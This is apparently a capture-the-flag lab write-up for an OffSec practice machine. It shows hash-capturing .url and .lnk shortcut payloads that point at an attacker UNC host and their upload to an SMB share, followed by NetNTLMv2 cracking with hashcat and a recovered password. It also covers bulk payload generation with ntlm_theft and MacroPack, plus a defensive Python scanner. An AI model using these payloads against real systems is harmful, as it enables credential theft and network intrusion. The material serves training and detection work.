Windows Internet Shortcut


Windows Internet Shortcut files, typically with the .url extension, are used to store the URL of a web page. These files are plain text and contain the internet address along with metadata such as the icon location and working directory. When double-clicked, they open the specified URL in the user’s default web browser. They are commonly used for quickly accessing websites or organizing web links on a desktop or within a file system.

Windows Internet Shortcut files can be exploited by embedding malicious URLs, leading to phishing attacks or drive-by downloads when opened, potentially compromising the system. Attackers can also manipulate these files to execute arbitrary commands or scripts by exploiting the way Windows handles certain parameters within the shortcut.

The most important point here is that these fields are not restricted to web protocols: a UNC path (\\host\share) is accepted as readily as http or https, and Explorer will resolve it, which makes this a well-known trick among adversaries.

Given that there is an SMB share named DocumentsShare, it is reasonable to assume that files within this share are accessed by users across the domain.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vault]
└─$ cat shortcut.url
[InternetShortcut]
WorkingDirectory=\\192.168.45.204\
 
IconIndex=0
IconFile=\\192.168.45.204\%USERNAME%

I will create a URL file with the icon trick, pointing to Kali's SMB server using a UNC path.
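As an added example that is not part of the original write-up, the following defender-side Python scan parses the INI-style shortcut formats involved here (.url, plus the .scf and desktop.ini variants) and flags any field Explorer resolves on browse that points at a UNC host outside an allowlist, reporting when the path smuggles an environment variable such as %USERNAME%; the .url content is the one shown above, while the .scf sample and its hostname are constructed.

```python
# Added example (not from the write-up): detect shortcut files that leak NTLM on browse.
import configparser
import re
from dataclasses import dataclass

# Keys Explorer dereferences while rendering a folder, i.e. without any click.
SUSPECT_KEYS = {"iconfile", "iconresource", "workingdirectory", "url"}
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")           # \\host\...
ENV_RE = re.compile(r"%[A-Za-z_][A-Za-z0-9_]*%")  # e.g. %USERNAME%

@dataclass
class Finding:
    section: str
    key: str
    value: str
    host: str
    expands_env: bool  # path carries an environment variable to the remote host

def scan_shortcut(text: str, trusted_hosts: frozenset = frozenset()) -> list:
    """One Finding per suspect key whose value is a UNC path to an untrusted host."""
    parser = configparser.RawConfigParser(strict=False, interpolation=None)
    parser.optionxform = str  # keep key spelling for the report
    parser.read_string(text)
    findings = []
    for section in parser.sections():
        for key, value in parser.items(section):
            if key.lower() not in SUSPECT_KEYS:
                continue
            match = UNC_RE.match(value.strip())
            if not match or match.group(1).lower() in trusted_hosts:
                continue
            findings.append(Finding(section, key, value.strip(),
                                    match.group(1).lower(), bool(ENV_RE.search(value))))
    return findings

# The shortcut.url from the write-up, and a constructed .scf (hostname is made up).
SAMPLE_URL = r"""[InternetShortcut]
WorkingDirectory=\\192.168.45.204\
IconIndex=0
IconFile=\\192.168.45.204\%USERNAME%
"""
SAMPLE_SCF = r"""[Shell]
Command=2
IconFile=\\fileserver.example.local\share\icon.ico
"""

if __name__ == "__main__":
    for f in scan_shortcut(SAMPLE_URL):
        print(f"[{f.section}] {f.key}={f.value} -> {f.host} env={f.expands_env}")
```

Running it over a share listing (one call per file) gives a quick triage of which shortcuts would make clients authenticate to an external host as soon as the folder is opened.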

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vault]
└─$ smbclient //$IP/DocumentsShare -U kali -N -c 'put shortcut.url'
lpcfg_do_global_parameter: WARNING: The "syslog" option is deprecated
putting file shortcut.url as \shortcut.url (1.7 kb/s) (average 1.7 kb/s)

Placing the malicious URL file in the DocumentsShare share

Got a hit back on the SMB server on Kali.

Password Cracking


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vault]
└─$ hashcat -a 0 -m 5600 anirudh.hash /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
ANIRUDH::VAULT:aaaaaaaaaaaaaaaa:3644a646e2233142b484d7ff9c9a01df:...:SecureHM
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: ANIRUDH::VAULT:aaaaaaaaaaaaaaaa:3644a646e2233142b48...000000
Time.Started.....: Thu May  1 21:18:04 2025 (3 secs)
Time.Estimated...: Thu May  1 21:18:07 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  4173.8 kH/s (1.65ms) @ Accel:1024 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10616832/14344385 (74.01%)
Rejected.........: 0/10616832 (0.00%)
Restore.Point....: 10604544/14344385 (73.93%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: ShaniLana123 -> Saboka54
Hardware.Mon.#1..: Util: 59%
 
Started: Thu May  1 21:18:04 2025
Stopped: Thu May  1 21:18:09 2025

Password hash cracked for the anirudh user: SecureHM

Validation


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vault]
└─$ impacket-getTGT VAULT.OFFSEC/anirudh@dc.vault.offsec -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: SecureHM
[*] Saving ticket in anirudh@dc.vault.offsec.ccache

Validated: a TGT was generated for the anirudh user.

WinRM

ntlm_theft


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vault]
└─$ ntlm_theft --generate all --server $tun0 --filename payload  ; cd payload
Created: payload/payload.scf (BROWSE TO FOLDER)
Created: payload/payload-(url).url (BROWSE TO FOLDER)
Created: payload/payload-(icon).url (BROWSE TO FOLDER)
Created: payload/payload.lnk (BROWSE TO FOLDER)
Created: payload/payload.rtf (OPEN)
Created: payload/payload-(stylesheet).xml (OPEN)
Created: payload/payload-(fulldocx).xml (OPEN)
Created: payload/payload.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: payload/payload-(includepicture).docx (OPEN)
Created: payload/payload-(remotetemplate).docx (OPEN)
Created: payload/payload-(frameset).docx (OPEN)
Created: payload/payload-(externalcell).xlsx (OPEN)
Created: payload/payload.wax (OPEN)
Created: payload/payload.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: payload/payload.asx (OPEN)
Created: payload/payload.jnlp (OPEN)
Created: payload/payload.application (DOWNLOAD AND OPEN)
Created: payload/payload.pdf (OPEN AND ALLOW)
Created: payload/zoom-attack-instructions.txt (PASTE TO CHAT)
Created: payload/Autorun.inf (BROWSE TO FOLDER)
Created: payload/desktop.ini (BROWSE TO FOLDER)
Generation Complete.

Generating payloads

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vault/payload]
└─$ smbclient //$IP/DocumentsShare -U kali -N -c 'prompt; mput *'        
lpcfg_do_global_parameter: WARNING: The "syslog" option is deprecated
putting file payload-(remotetemplate).docx as \payload-(remotetemplate).docx (316.9 kb/s) (average 316.9 kb/s)
putting file payload-(externalcell).xlsx as \payload-(externalcell).xlsx (104.1 kb/s) (average 230.9 kb/s)
putting file payload-(stylesheet).xml as \payload-(stylesheet).xml (2.9 kb/s) (average 164.4 kb/s)
putting file payload-(url).url as \payload-(url).url (0.0 kb/s) (average 14.8 kb/s)
putting file payload.pdf as \payload.pdf (12.8 kb/s) (average 14.8 kb/s)
putting file payload.wax as \payload.wax (1.0 kb/s) (average 14.4 kb/s)
putting file payload-(includepicture).docx as \payload-(includepicture).docx (163.6 kb/s) (average 18.3 kb/s)
putting file payload.application as \payload.application (27.8 kb/s) (average 18.6 kb/s)
putting file payload-(frameset).docx as \payload-(frameset).docx (172.2 kb/s) (average 22.2 kb/s)
putting file Autorun.inf as \Autorun.inf (1.5 kb/s) (average 21.8 kb/s)
putting file payload.lnk as \payload.lnk (38.4 kb/s) (average 22.1 kb/s)
putting file payload-(icon).url as \payload-(icon).url (1.9 kb/s) (average 21.7 kb/s)
putting file payload.htm as \payload.htm (1.5 kb/s) (average 21.3 kb/s)
putting file payload.scf as \payload.scf (1.5 kb/s) (average 20.9 kb/s)
putting file payload.rtf as \payload.rtf (1.9 kb/s) (average 20.5 kb/s)
putting file payload.jnlp as \payload.jnlp (3.4 kb/s) (average 20.1 kb/s)
putting file payload.asx as \payload.asx (2.5 kb/s) (average 19.8 kb/s)
putting file desktop.ini as \desktop.ini (0.9 kb/s) (average 19.4 kb/s)
putting file payload-(fulldocx).xml as \payload-(fulldocx).xml (834.0 kb/s) (average 42.3 kb/s)
putting file zoom-attack-instructions.txt as \zoom-attack-instructions.txt (2.1 kb/s) (average 41.6 kb/s)
putting file payload.m3u as \payload.m3u (0.7 kb/s) (average 40.6 kb/s)

Uploading them all: the shotgun approach.

macro_pack.exe


MacroPack Community is a tool used to automate the obfuscation and generation of retro formats such as MS Office documents or VBS-like formats. It also handles various shortcut formats. This tool can be used for red teaming, pentests, demos, and social engineering assessments. MacroPack simplifies antimalware bypass and automates the process from VB source to the final Office document or other payload type. It is very simple to use:

  • No configuration required
  • Everything can be done using a single line of code
  • Generation of the majority of Office formats and VBS-based formats
  • Payloads designed for advanced social engineering attacks (email, USB key, etc)

The tool is compatible with payloads generated by popular pentest tools (Metasploit, Empire, …). It is also easy to combine with other tools, as it can read input from stdin and produce quiet output for piping into another tool. This tool is written in Python 3 and works on both Linux and Windows platforms.

Note: Windows platform with the right MS Office applications installed is required for Office documents automatic generation or trojan features.

.url


PS C:\Users\admin\Desktop\macro_pack> echo "\\\\192.168.45.204\\blahblah" | .\macro_pack.exe -G payload.url
 
 _  _   __    ___  ____   __     ____   __    ___  __ _
 ( \/ ) / _\  / __)(  _ \ /  \   (  _ \ / _\  / __)(  / )
 / \/ \/    \( (__  )   /(  O )   ) __//    \( (__  )  (
 \_)(_/\_/\_/ \___)(__\_) \__/   (__)  \_/\_/ \___)(__\_)
 
 
   Malicious Office, VBS, Shortcuts and other formats for pentests and redteam - Version:2.2.0 Release:Community
 
 
 [+] Preparations...
   [-] Waiting for piped input feed...
   [-] Target output format: URL Shortcut
   [-] Temporary working dir: C:\Users\admin\Desktop\macro_pack\temp
 [+] Prepare URL Shortcut file generation...
 [+] Generating URL Shortcut file...
   [-] Generated URL file: C:\Users\admin\Desktop\macro_pack\payload.url
   [-] Test with :
 Click on C:\Users\admin\Desktop\macro_pack\payload.url file to test.
 
 [+] Cleaning...
 Done!

Creating the payload.url file

.lnk


PS C:\Users\admin\Desktop\macro_pack> echo "\\\\192.168.45.204\blahblah" | .\macro_pack.exe -G payload.lnk
  _  _   __    ___  ____   __     ____   __    ___  __ _
 ( \/ ) / _\  / __)(  _ \ /  \   (  _ \ / _\  / __)(  / )
 / \/ \/    \( (__  )   /(  O )   ) __//    \( (__  )  (
 \_)(_/\_/\_/ \___)(__\_) \__/   (__)  \_/\_/ \___)(__\_)
 
 
   Malicious Office, VBS, Shortcuts and other formats for pentests and redteam - Version:2.2.0 Release:Community
 
 
 [+] Preparations...
   [-] Waiting for piped input feed...
   [-] Target output format: Shell Link
   [-] Temporary working dir: C:\Users\admin\Desktop\macro_pack\temp
 [+] Prepare Shell Link file generation...
 [+] Generating Shell Link file...
   [-] Generated Shell Link file: C:\Users\admin\Desktop\macro_pack\payload.lnk
   [-] Test with:
Browse C:\Users\admin\Desktop\macro_pack\payload.lnk dir to trigger icon resolution. Click on file to trigger shortcut.
 
 [+] Cleaning...
 Done!